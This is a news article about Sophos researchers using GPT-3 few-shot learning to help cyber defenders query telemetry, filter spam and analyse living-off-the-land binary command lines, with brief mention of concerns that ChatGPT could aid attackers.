Key highlights
- Researchers have shown how ChatGPT can be a cybersecurity tool.
- Amid concerns that the AI tool could lead to a surge in cyber threats, researchers say the same tool can be used to fight threats.
- The experts said the the AI model can more easily filter malicious activity, improve spam filters, and simplify the analysis of living off the land binaries.
Researchers at Sophos, a global cybersecurity company, have demonstrated how the cybersecurity industry can leverage GPT-3, the language model behind the now well-known ChatGPT framework, as a co-pilot to help defeat cyber attackers.
This is coming amid concerns that the AI tool could expose businesses to more security threats.
In a report titled “Applying AI Language Processing to Cyber Defenses,” the researchers said they developed a project using GPT-3’s large language models to simplify the search for malicious activity in datasets from security software and it more accurately filters spam, and speed up analysis of “living off the land” binary (LOLBin) attacks.
Potential risks and opportunities in GPT: While noting that all attention has been on the potential security risks in the AI tool, Principal Threat Researcher at Sophos, Sean Gallagher, said:
- “Since OpenAI unveiled ChatGPT back in November, the security community has largely focused on the potential risks this new technology could bring. Can AI help wannabee attackers write malware or help cybercriminals write much more convincing phishing emails? Perhaps, but, at Sophos, we’ve long seen AI as an ally rather than an enemy for defenders, making it a cornerstone technology for Sophos, and GPT-3 is no different.
- “The security community should be paying attention not just to the potential risks, but the potential opportunities GPT-3 brings,” said Sophos X-Ops researchers, including SophosAI Principal Data Scientist Younghoo Lee, who has been working on three prototype projects that demonstrate the potential of GPT-3 as an assistant to cybersecurity defenders. All three use a technique called “few-shot learning” to train the AI model with just a few data samples, reducing the need to collect a large volume of pre-classified data.”
The first test: The researchers said the first application they tested with the few-shot learning method was a natural language query interface for sifting through malicious activity in security software telemetry. Specifically, they tested the model against its endpoint detection and response product.
- “With this interface, defenders can filter through the telemetry with basic English commands, removing the need for defenders to understand SQL or a database’s underlying structure.”
Next, Sophos tested a new spam filter using ChatGPT and found that, when compared to other machine learning models for spam filtering, the filter using GPT-3 was significantly more accurate.
- “Finally, Sophos researchers were able to create a program to simplify the process for reverse-engineering the command lines of LOLBins. Such reverse-engineering is notoriously difficult, but also critical for understanding LOLBins’ behaviour—and putting a stop to those types of attacks in the future.
- “We’ve proved that, with something like GPT-3, we can simplify certain labour-intensive processes and give back valuable time to defenders. We are already working on incorporating some of the prototypes above into our products, and we’ve made the results of our efforts available on our GitHub for those interested in testing GPT-3 in their own analysis environments. In the future, we believe that GPT-3 may very well become a standard co-pilot for security experts,” said Gallagher.
The backstory: Many cybersecurity experts have expressed concerns that ChatGPT could be abused by hackers with limited resources and zero technical knowledge. Just weeks after ChatGPT debuted, Israeli cybersecurity company Check Point demonstrated how the web-based chatbot, when used in tandem with OpenAI’s code-writing system Codex, could create a phishing email capable of carrying a malicious payload.
However, Sophos researchers are pointing to the positive aspect of the AI tool in even tackling cybersecurity issues.